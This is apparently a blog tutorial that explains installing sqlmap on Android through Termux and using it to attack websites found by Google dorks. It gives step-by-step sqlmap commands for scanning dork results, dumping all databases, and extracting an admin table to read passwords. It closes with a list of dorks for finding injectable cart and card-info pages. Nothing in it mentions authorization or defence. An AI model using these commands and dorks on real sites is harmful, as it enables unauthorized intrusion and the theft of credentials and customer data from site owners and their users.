How To Hack Website Using Android Without Root (SQLMAP Tutorial & Installation)

How To Hack Website Using Android Without Root (SQLMAP Tutorial & Installation )

Here You Can First see the video to how to install the sql injection in termux (Android with or without root ) and also see on YouTube 

Link https://youtu.be/_iLUU0eHTgM

                             

Hello everyone, Today I am going to show you how to install SQLMAP on Android without root permission and hack website with sql injection. Basically, sqlmap is designed for the Linux, and it's based on some basic SQL injection vulnerabilities like blind, time-base, error-based etc. I personally found out this trick and brought it for you guys!  This works with non rooted phones and it won’t need much space to install. Hardly 20mb is needed. So you can use it. Also, it doesn’t need any Linux distro and all heavy files you can use it in small phones. Also I personally tested it on many non-rooted phones. It is working fine. The basic thing you need is brain  Nothing else now! I’m not wasting your precious time more.

So let’s start!

Requirements 

• Termux(Linux terminal contain many inbuilt commands)
• Sqlmap(most important use for SQL injection)
• File manager(to view log & DB)
• Patience & brain 

Also Read: HAPPY DIWALI 2019 IMAGES

SQL MAP On Android: Installation

• First, install all apps from above link and run it at least once download that sqlmap zip file and extract it in sd card and change its name
• After that open Termux and run gave the command

apt update && apt upgrade

• It takes some time to update it will ask that some space is required you want to install simply press y to yes it took a small amount of space to install
• If you are using 6+ android version  phone then you need to run this command or if you use the lower version you can simply skip it’s not mandatory but I suggest you to run it

            termux-setup-storage

GBWhatsApp APK Download (Oficial) v8.00 Latest Version September 2019

•   It will ask you to allow permission of using your internal storage to proceed just hit that allow button and go to the next step

packages install python2

•   This command install python in your termux it asks you what you want to install python enter y for installing python2 in your termux

Let’s Start

•  Now all set you just need to find sqlmap.py in your phone and navigate using cd first you need to access root folder so first run

cd /

Then type

cd sdcard 
cd ls 

• It will show you all files now you need to find sqlmap-master(extracted folder)

cd sqlmap-master 

cd sqlmap-master

• Two times sqlmap-master if you already change name of sqlmap-master to sqlmap then you can run

cd sqlmap

cd sqlmap-master

• You can take help of  “ls ” command to list down all files on that location
• Navigate to the sqlmap-master folder where the sqlmap.py is stored to run that sqlmap you need following command

python2 sqlmap.py

Get All Udemy Latest Courses In Free September 2019 Updated 

• If you see this red color sqlmap then you are done with the installation of sqlmap now next step is hacking the website using sqlmap it you need to find the website with sql vulnerability  or you can use simple method inbuilt sqlmap google dork to find website
• If you are using google dork then

python2 sqlmap.py -g  your_keyword 

• If you want to use direct url then

python2 sqlmap.py -u your_url

• You can refer sqlmap official site for help or just type python2 sqlmap.py -h  for basic help python2 sqlmap.py -hh for advance help
• If you want to hack whole site with all database and tables just add -a with python2 sqlmap.py -g  your_keyword  or with python2 sqlmap.py -u your_url 
• In google dork method  it will give you three option yes for attacking the first site which comes in result for selecting it you need to type “y”  for skipping to next target you can use “n” and for quite use “q”

Get Set Attack!

• After that, it will start attacking on-site wait until it finishes it may ask you following question just simply hit “y”

• After that, it will show you many tables and everything that sqlmap hacked don’t  worry  you can view it in log when  process done
• Now if you want to see all the tables you need to run following command

python2 sqlmap.py -u url --tables

• It will return all tables name that already hacked by sqlmap now choose the table you want to view by simply entering following command in my case I want to view the admin table to view password, so I run

python2 sqlmap.py -u url -T your_table name

• This command will save your table data and log file in root folder which is not accessible to normal  non rooted phone but no worry we have solution this terminal can access, so we are going to copy this file to your internal storage for view it with the non-rooted phone also

cp source //sdcard

• Just replace the source with the source given by terminal in above command it will omit the dump file but don’t worry we don’t need it now navigates to the file using your inbuilt file manager or use ES file manager

• Congo! You successfully hacked a  website using sqlmap with sql injection on Android.

Dorks

I’m giving below some important dorks here, so you can find SQL vulnerable sites easily!

add-to-cart.php?ID=

addToCart.php?idProduremember

tomylist.php?ProdId=

adminEditProductFields.php?intProdID=

advSearch_h.php?idCategory=

affiliate.php?ID=

affiliate-agreement.cfm?storeid=

affiliates.php?id=

ancillary.php?ID=

archive.php?id=

article.php?id=

phpx?PageID

basket.php?id=

Book.php?bookID=

book_list.php?bookid=

book_view.php?bookid=

BookDetails.php?ID=

browse.php?catid=

browse_item_details.php

Browse_Item_Details.php?Store_Id=

buy.php?

buy.php?bookid=

bycategory.php?id=

cardinfo.php?card=

cart.php?action=

cart.php?cart_id=

cart.php?id= 

← PREVIOUS POST HOW TO HACK ANY PASSWORDS

                              → NEXT POST HOW TO HACK EMAIL ACCOUNT                                                                    

Thanks for reading this very first article by me! Just remember